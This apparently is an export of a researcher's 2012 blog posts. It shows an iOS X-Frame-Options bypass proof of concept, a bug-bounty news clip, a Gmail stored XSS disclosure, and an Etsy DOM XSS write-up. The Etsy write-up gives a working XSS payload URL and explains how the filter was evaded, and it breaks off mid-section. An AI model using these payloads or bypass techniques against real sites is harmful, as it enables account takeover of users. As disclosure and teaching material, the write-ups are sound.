<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkVd9_NoF93btjCWjzCKhKx-ZFeXlmwr2kz2h1Ceg8dt3v2GwR6eLBCW3KDFqUK40Gylmp2rNOl2nco9LjWxfIrNIXXiio79G7D5mvaEID5YN-GB0NoP2CmkUqf27b69kV7fyYXG1DL4/s1600/photo.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkVd9_NoF93btjCWjzCKhKx-ZFeXlmwr2kz2h1Ceg8dt3v2GwR6eLBCW3KDFqUK40Gylmp2rNOl2nco9LjWxfIrNIXXiio79G7D5mvaEID5YN-GB0NoP2CmkUqf27b69kV7fyYXG1DL4/s400/photo.PNG" width="266" /></a></div>
<span style="font-family: Arial;"><br /></span>
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<b style="color: #999999; font-family: Arial; font-size: xx-large;">PoC Test Page:</b></div>
<div style="background: #202020; background: black; border-width: .1em .1em .1em .8em; border: solid gray; color: white; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><html></span>
<span style="color: #6ab825; font-weight: bold;"><head><title></span>X-Frame-Options Bypass<span style="color: #6ab825; font-weight: bold;"></title></head></span>
<span style="color: #6ab825; font-weight: bold;"><h1></span>Apple PoC X-Frame-Options <span style="color: #6ab825; font-weight: bold;"></h1></span>
<span style="color: #6ab825; font-weight: bold;"><iframe</span> <span style="color: #bbbbbb;">id=</span><span style="color: #ed9d13;">"X"</span> <span style="color: #bbbbbb;">src=</span><span style="color: #ed9d13;">"http://www.google.com"</span><span style="color: #6ab825; font-weight: bold;">></iframe></span>
<span style="color: #6ab825; font-weight: bold;"><script></span>
<span style="color: #d0d0d0;">framex</span> <span style="color: #d0d0d0;">=</span> <span style="color: #24909d;">document</span><span style="color: #d0d0d0;">.getElementById(</span><span style="color: #ed9d13;">"X"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">framex.onload</span> <span style="color: #d0d0d0;">=</span> <span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">()</span> <span style="color: #d0d0d0;">{</span> <span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
<span style="color: #6ab825; font-weight: bold;"></html></span>
</pre>
</div>
<br />
<span style="font-family: Arial;">Btw, This also means ClickJacking Anywhere Over IOS 5 and lower victims.</span><br />
<span style="font-family: Arial;"><br /></span>
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>So What Should I Do?</b></span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">Well, Apple did good and fixed this issue in the New IOS (6.0.1)</span><br />
<span style="font-family: Arial, sans-serif;">Unless you want to stay vulnerable knowning you can be a victim to advanced client side attacks over your gmail/facebook make sure you use IOS 6.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-3890268686969013772012-08-26T21:04:00.002+03:002012-08-26T21:18:10.132+03:00White-hat cyberbug bounty nets cash - NYPOST <span style="color: #f6b26b; font-family: 'Arial Black'; font-size: 35.5px; letter-spacing: -2px; line-height: 1em;">White-hat cyberbug bounty nets cash</span><br />
<h2>
<span style="font-family: Arial; font-size: 12px; font-weight: normal;">By SARA ASHLEY O’BRIEN</span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Come on, White Hats: Hack into our system, find a bug — and make it an interesting one! This seems to be the resounding message that major online businesses are spreading.<br />With US spending on cybercrime security estimated to exceed $23 billion this year, according to the research company Gartner, online businesses are onto the fact that cybercrime is a very real threat.`<br /><br /> <br />`Businesses like Facebook, Google, Mozilla, Adobe, Microsoft and, as of June, PayPal, have developed “Bug Bounty” programs to recruit savvy security researchers like Hayak to help fight the good fight against cybercrime.</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><b style="font-family: Arial;"><span style="color: #e69138;">These Are snippets from a great story I got to be part of advertised in the NYPOST</span></b><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Read more:</span><br />
<a href="http://www.nypost.com/p/news/business/white_hat_cyberbug_bounty_nets_cash_7c6JPTUlEmoDBsszeD6c1I#ixzz24g0m8SUC" style="font-family: Arial;" target="_new">http://www.nypost.com/p/news/business/white_hat_cyberbug_bounty_nets_cash</a><span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;"><br /></span><span style="font-family: Arial;">Great Write </span><br />
<span style="font-family: Arial;">I appreciate the story very much, Thank you NYPOST</span><br />
<span style="font-family: Arial;"><br /></span>
<span style="font-family: Arial;"><br /></span></div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-81602446665511744732012-06-27T01:27:00.002+03:002012-06-27T01:49:45.613+03:00Google Mail Hacking - Gmail Stored XSS - 2012!<h2>
<span class="Apple-style-span" style="color: #999999; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large;">Gmail Accounts Hacking Risk 2012!</span><span style="font-size: large;"> </span></span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<span style="font-family: Arial, Helvetica, sans-serif;">Millions of users use <b><span style="color: #f6b26b;">Gmail </span></b>as their information center to perform actions such as <b><span style="color: #f6b26b;">Business, Chat, Place Orders, Payment confirmation, main password recovery mail</span></b> for different web services and so on...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">many people - <i>including myself </i>use Gmail to store and save important and personal data, <b><span style="color: #f6b26b;">none of us want our data to be at risk of steal</span>,</b> manipulation, and obviously not considering the Gmail account being completely hacked!</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #f6b26b;">I found a possibility to do all that!</span></b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Fortunate enough for us, Google is taking a lot of efforts securing their services. mostly by doing a great job, which integrates supporting a vulnerability reward program.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I made a quick research and reported this vulnerability along with all the related details. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I must say Google's response was very quick and so as their fix.<span style="color: orange;"> (<b>it is Fixed</b>)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">as it appears here :<a href="http://www.google.com/about/company/rewardprogram.html">Vulnerability Reward Program</a> even after the bounty raise:</span><br />
<span style="color: #ffe599; font-family: Arial, Helvetica, sans-serif;">Google's Reward for this bug: <b>$1337 (mail.google.com)</b></span><br />
<span style="font-family: Arial;">PoC Picture:</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s1600/gmail+XSS+05+2012+-blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s400/gmail+XSS+05+2012+-blog.png" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b><span style="font-size: large;"><span style="font-family: Arial, Helvetica, sans-serif;">Technical Details:</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span></span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />I am quite busy at work and personal life at these days so I placed a side the reward programs of Google, Facebook And others.</span></div>
<div style="direction: ltr;">
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I was just checking my mail the other day and I noticed something different.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Google made this nice change in Gmail , apparently around December 2011 - <a href="http://www.googleplusplanet.com/2011/12/google-adds-circles-gmail/">Google Adds circles to Gmail</a> </span><br />
<b><span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: large;">"Users can now Filter their Mails based on their Circles"</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="color: #999999; font-family: Arial;"><span style="font-size: x-large;">Trusting your Google+ Friends?</span></b></div>
<div style="direction: ltr;">
<div>
<br />
<span style="font-family: Arial;">When I clicked this Gmail Circles feature, I saw my Google+ connections: profile pictures, nicknames and some other</span><span style="font-family: Arial;"> circles related data </span><br />
<span style="color: #f6b26b; font-family: Arial;"><b>Do they Control this data?! - Yes!</b></span></div>
<div>
<span style="font-family: Arial;">I had to spend some time back in the business, Gmail Stored XSS is a serious finding!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">So I imminently researched that feature's JavaScript code.</span><br />
<span style="font-family: Arial;">It appeared that data that comes from Google+ wa</span><span style="font-family: Arial, Helvetica, sans-serif;">s not sanitized by Gmail!</span><br />
<span style="font-family: Arial;"><br /></span></div>
<div style="background-color: black; background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> </span><span style="color: #d0d0d0;">zk.prototype.Ca</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">function</span><span style="color: white;"> </span><span style="color: #d0d0d0;">$pn(a,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">c,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">d)</span><span style="color: white;"> </span><span style="color: #d0d0d0;">{</span><span style="color: white;">
</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.xa</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span></pre>
<pre style="line-height: 125%; margin: 0px;"> <span style="color: #6ab825; font-weight: bold;">if</span><span style="color: white;"> </span><span style="color: #d0d0d0;">(!</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea)</span><span style="color: white;"> </span><span style="color: #d0d0d0;">{</span><span style="color: white;">
</span><span style="color: #6ab825;"><b>//Shorten/removed</b></span><span style="color: white;">
</span><span style="color: #6ab825; font-weight: bold;">var</span><span style="color: white;"> </span><span style="color: #d0d0d0;">e</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.Bb.zb().body,</span><span style="color: white;"> </span><span style="color: #d0d0d0;">g</span><span style="color: white;"> </span><span style="color: #d0d0d0;">=</span><span style="color: white;"> </span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va();</span><span style="color: white;">
</span><b style="background-color: black; color: #6ab825;">//Shorten/removed</b></pre>
<pre style="color: white; line-height: 125%; margin: 0px;"> <span style="color: #d0d0d0;">e.wa</span> <span style="color: #d0d0d0;">=</span> <span style="color: #d0d0d0;">h</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">a:</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">if</span> <span style="color: #d0d0d0;">(d)</span>
<span style="color: #6ab825; font-weight: bold;">switch</span> <span style="color: #d0d0d0;">(d.toLowerCase().split(</span><span style="color: #ed9d13;">","</span><span style="color: #d0d0d0;">)[</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">])</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">case</span> <span style="color: #ed9d13;">"l"</span><span style="color: #d0d0d0;">:</span>
<span style="color: #6ab825; font-weight: bold;">break</span> <span style="color: #d0d0d0;">a;</span>
<span style="color: #6ab825; font-weight: bold;">case</span> <span style="color: #ed9d13;">"r"</span><span style="color: #d0d0d0;">:</span>
/removed<span style="color: #d0d0d0;">;</span>
<span style="color: #6ab825; font-weight: bold;">break</span> <span style="color: #d0d0d0;">a</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">e</span> <span style="color: #d0d0d0;">=</span> <span style="color: #3677a9;">2</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.setPosition(cka(d),</span> <span style="color: #d0d0d0;">e,</span> <span style="color: #d0d0d0;">i,</span> <span style="color: #d0d0d0;">-</span><span style="color: #3677a9;">1</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">jc(</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va(),</span> <span style="color: #ed9d13;">"T-ays-avH"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">ud(</span><span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.ea.va(),</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">,</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: red;">.ea.Mc().innerHTML = <b>c</b>; <b></b></span><b><span style="color: orange;">//c = Data from Google+;</span></b>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.To(a);</span>
<span style="color: #6ab825; font-weight: bold;">this</span><span style="color: #d0d0d0;">.wa.Me(k,</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">)</span>
<span style="color: #d0d0d0;">};</span>
</pre>
</div>
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">This Gmail Code was creating a Tool-tip that Included profile circles information that comes from your Google Plus friend's account, if they used a payload, your mail account would have been at a serious risk.</span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Exploiting the Vulnerability - malicious Google+ Account.</b></span><br />
<div>
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">As First it is important to note that <b><span style="color: #f6b26b;">Anyone </span></b>that already got accepted as your friend in Google+ could trigger this attack on your Gmail account!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">So all that is left is crafting a very nice Google+ account with some attractive profile, then after this evil account gets many friends/victims - Attack em all!</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;"><span style="color: #f6b26b;"><b>Google+ </b><b>was </b>and still is <b>blocking </b>the <b>possibility of using a payload in the required field that was used</b> to trigger this attack, but </span><b><span style="color: #f6b26b;">I found a way around it</span>, </b>sorry but I cannot reveal how I did that. (I am sure some of you pros might know how).</span></div>
<div>
<span style="font-family: Arial;"><br /></span></div>
<div>
<span style="font-family: Arial;">After I used my technique and crafted the Google+ evil profile it was possible to attack Gmail of all of that profile's friends! </span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">PoC Picture: </span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s1600/gmail+XSS+05+2012+-blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSG5RrSsqxmDSIvvP1icu-MdVIu3zNy2Zjz9rkOeqM18Pa30em-EIk6dit_HYwriV4fIRiJ7piMds5Z8MUZ3vJkZ-taAWqlHsqihC5jo5tCnUpvrDusTKY4CCUKo3J2x7kyIXX75WP1U/s400/gmail+XSS+05+2012+-blog.png" width="400" /></a><br />
<br />
<br />
<div style="text-align: left;">
<span style="font-family: Arial;"></span></div>
<span style="font-family: Arial;">As always I appreciate the opportunity to preserve my skills and gain some more experience</span><br />
<span style="font-family: Arial;">Thank you Google security team.</span><br />
<span style="font-family: Arial;"><br /></span><br />
<span style="font-family: Arial;">"Ben Hayak" - Google Security Hall of Fame Page</span><br />
<span style="font-family: Arial;"><a href="http://www.google.com/about/company/halloffame.html">http://www.google.com/about/company/halloffame.html</a>
</span><br />
<br />
<br />
<span style="font-family: Arial;"><br /></span></div>
</div>
</div>[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com17tag:blogger.com,1999:blog-7534521580510357281.post-9378099719554740982012-06-15T03:05:00.001+03:002012-06-15T08:15:46.835+03:00Layer3 DOM XSS in Latest jquery - Etsy<h2>
<span class="Apple-style-span" style="color: #cccccc; font-family: Arial, Helvetica, sans-serif; font-size: large;">Turning Useless Self DOM XSS into a treat!</span></h2>
<div style="direction: ltr;">
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">During my research and study over DOM XSS and developing my own detection technique, I found this interesting case which a DOM XSS undetected by any DOM XSS scanner I came across triggered, so I decided to share and provide a quick overview of how I took this self layer 3 DOM XSS into a Working and exploitable DOM XSS.</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span"></span><span style="font-family: Arial;">it all started with this small code:</span></div>
<div style="direction: ltr;">
<br /></div>
<div style="direction: ltr;">
<div style="background: black; border-color: gray; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; color: white; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<table><tbody>
<tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre>
</td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #6ab825; font-weight: bold;"><script </span><span style="color: #bbbbbb;">type=</span><span style="color: #ed9d13;">"text/javascript"</span><span style="color: #6ab825; font-weight: bold;">></span>
<span style="color: #d0d0d0;">Etsy.loader.require(</span><span style="color: #ed9d13;">'jquery.ba-hashchange'</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">Etsy.loader.require(</span><span style="color: #ed9d13;">'help'</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</td></tr>
</tbody></table>
</div>
</div>
<div style="direction: ltr;">
<br />
<span style="font-family: Arial;">This is Going to be a long one but this covers:</span><br />
<br />
<ul>
<li><span style="font-family: Arial;">DOM XSS.</span></li>
<li><span style="font-family: Arial;">Logic Flow Exploitation .</span></li>
<li><span style="font-family: Arial;">JQuery Vulnerability (Latest release - Unpatched yet).</span></li>
</ul>
<br />
<br />
<span style="font-family: Arial;">Final Conclusions:</span><span style="font-family: Arial;"><br /><span style="color: orange;">1. 1st conclusion(easy) the main javascript layer loads a second dynamic block (covered)</span></span><br />
<span style="font-family: Arial;">2. the payload goes through the dynamic code block and inside gets through a filter to avoid DOM XSS (appears as Self-Only).</span><br />
<span style="font-family: Arial;">3. the layer 2 code block loads another layer(3) this time it is jquery, and then exectue a function that is vulnerable to DOM XSS(latest version 1.72 and older versions as well).</span><br />
<span style="font-family: Arial;"><br /></span></div>
<div style="direction: ltr;">
<h3>
<span style="color: #999999;"><span style="font-family: Arial; font-size: x-large;">Self DOM XSS?</span></span></h3>
</div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
using the help section search feature I could trigger a very simple XSS by typing the payload in the search box and hit search X_X,This is pretty lame. </span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">(once I used a payload directly in the url it got filtered without trigger)</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">We need the victim to be careless enough to actually type the payloa</span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">d and click the search button. I consider this situation as almost worthless and low risk Self XSS, </span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">so I thought this might be useless and not exploitable.
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<h3>
<span class="Apple-style-span" style="color: #999999; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Strange Behavior (not so fast...):</span></h3>
</div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">But, that is when I noticed a strange behavior!
Look at the picture below:</span></div>
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> (using a payload of <img src=1 onerror=javascript......>)</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfk-aFqmzbAnoPgNS0mB-Zylf2XTFHjIWhWWxQHNTWSfn8IiP86R37B3u2jhhrijMwqL_YCW_sZ637hzv13vxVDGuvVch44lKqy_j_hLjH_uu4QKzFq941SZ57qj8HNoNiNhfh1dk8Hs/s1600/etsy.PNG" imageanchor="1" style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfk-aFqmzbAnoPgNS0mB-Zylf2XTFHjIWhWWxQHNTWSfn8IiP86R37B3u2jhhrijMwqL_YCW_sZ637hzv13vxVDGuvVch44lKqy_j_hLjH_uu4QKzFq941SZ57qj8HNoNiNhfh1dk8Hs/s400/etsy.PNG" width="400" /></a></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Something strange?
</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">If you do not see it you should gather yourself and look more carefully next time you think you covered the security holes and were about to report: not exploitable or low risk vulnerability.</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<h3>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
<span style="color: #999999; font-size: x-large;">What is so strange?</span></span></h3>
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">what you can see in the picture is that the XSS triggered (<img src=1> TAG) and for some reason the payload "<em>disappeared"</em> from the URL Query right?</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Oh wait, was it???
No!</span></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
It was only filtered! the query is now changed to "http://site.com/help/2643#/afsddddddd<span style="color: orange;">/1</span>"
where did that "<span style="color: orange;">/1</span>" came from? what is going on? <br />
let us run more tests: </div>
<div style="direction: ltr;">
Look what happens when I used this URL: <br />
"http://site.com/help/2643#/<span style="color: orange;">String 2ndString/1"</span></div>
<div style="direction: ltr;">
<br />
The filter turned it into the following:<br />
http://site.com/help/2643#/String/2ndString<span style="color: orange;">/1</span><br />
<br />
Now that is definitely worth a deeper look at the code loaded as layer 2:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmW3PaQDUC6mI2ZEJ3vgBZHp_W5oP6fdZRVxOCiIELVG1LC-Nojf1V6soykbbldjopr9qmQEySKTtADHazAbTbaVl-WfZ4VU2t8UmiQ2cHjEzNTMOMdjnYsVdDD2KU8xvBrxZ7NLBkCss/s1600/backslash+S.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmW3PaQDUC6mI2ZEJ3vgBZHp_W5oP6fdZRVxOCiIELVG1LC-Nojf1V6soykbbldjopr9qmQEySKTtADHazAbTbaVl-WfZ4VU2t8UmiQ2cHjEzNTMOMdjnYsVdDD2KU8xvBrxZ7NLBkCss/s400/backslash+S.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-size: x-large;">Filter Details (YES It is vulnerable):</span></h3>
</div>
</div>
<div style="direction: ltr;">
</div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<img=1>The Filter was checking for location.hash, and replaced any space with a "forward slash" to separate the query string as well as replacing any potential XSS HTML Tag with NULL using a regex.</img=1><br />
<br />
<img=1>seems right, but, There was a <span style="font-size: large;">HUGE </span>Security Hole.</img=1><br />
<br />
<span style="font-family: Arial;">Final Conclusions again:</span><span style="font-family: Arial;"><br />1. 1st conclusion(easy) the main javascript layer loads a second dynamic block (covered).<span style="color: red;"><br /></span></span><br />
<span style="color: orange; font-family: Arial;">2. the payload goes through the dynamic code block and inside gets through a filter to avoid DOM XSS (appears as Self-Only) (covered).</span><br />
<span style="font-family: Arial;">3. the layer 2 code block loads another layer(3) this time it is jquery, and then execute a function that is vulnerable to DOM XSS(latest version 1.72 and older versions as well).</span><br />
<img=1></img=1><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-size: x-large;">HUGE Security Hole in legitimate XSS Filter:</span></h3>
</div>
</div>
<br />
<img=1>This is where the magic happened! there is a javascript code block condition, this condition determines if the user is actually using the search feature and should be checked for DOM XSS using the layer 2 code block javascript code or not. </img=1><br />
<img=1>after researching all the relevant code in the javascript filter block, it appeared that exploitation is pretty simple!</img=1><br />
<img=1>legitimate behavior: </img=1><br />
http://site.com/help/2643<span style="color: orange;">#/</span><strong>PAYLOAD</strong>/1<br />
<br />
<strong><span style="color: #e69138;">So once the search string starts with Forward Slash "/" the condition match, </span></strong><strong><span style="color: #e69138;">the system consider this a legitimate safe search, and the filter will replace any payload with NULL then pass <u>filtered</u> payload to a vulnerable jquery function.</span></strong><br />
<br />
Remember! This is a DOM event that executes jquery! <br />
<br />
So what had to be done is:<br />
<strong><span style="color: #e69138;">1. Insert a Forward slash into the global URI (Before the hash sign).</span></strong><br />
<span style="color: #e69138;"><br /></span><br />
<strong><span style="color: #e69138;">2. Then insert the payload into the client-side only URI (Right after the hash sign without a slash)</span></strong><br />
<br />
Logic flow Vulnerability:<br />
This way I managed to Trick the system to pass the Forward Slash Condition, and cause the filter to fail and step over the regex to the next stage of <b>passing my payload directly into the vulnerable jquery function! </b><br />
<br />
Final Payload:<br />
http://site.com/help/2643<span style="color: orange;">/#<img src=1 onerror=javascript:alert('EXPLOITABLE!')></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoK-Ea1KQ0xnRP4levlEi6WOIwODaVC0hQZawugSGPM621Fx0xJdz3h7TL0SWiyRJ60RdcIJ3nrZqwI5hyphenhyphenBqofuvXoCpr2JsNfJfvUwvYNFCitz9XFl5HD4E6Bkt8Rw6I20wGOKc5k-L8/s1600/etsy-DOM.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoK-Ea1KQ0xnRP4levlEi6WOIwODaVC0hQZawugSGPM621Fx0xJdz3h7TL0SWiyRJ60RdcIJ3nrZqwI5hyphenhyphenBqofuvXoCpr2JsNfJfvUwvYNFCitz9XFl5HD4E6Bkt8Rw6I20wGOKc5k-L8/s320/etsy-DOM.PNG" width="320" /></a></div>
<br /></div>
</div>
</span><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
</div>
</div>
</div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<div style="direction: ltr;">
<span style="font-family: Arial, Helvetica, sans-serif;">but why is this vulnerable?</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="direction: ltr;">
<div style="direction: ltr;">
<h3>
<span style="color: #999999; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Vulnerable DOM XSS CODE - </span></h3>
<h3>
<span style="color: #999999; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">JQUERY(line 10):</span></h3>
</div>
</div>
<br class="Apple-interchange-newline" /></div>
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="direction: ltr;">
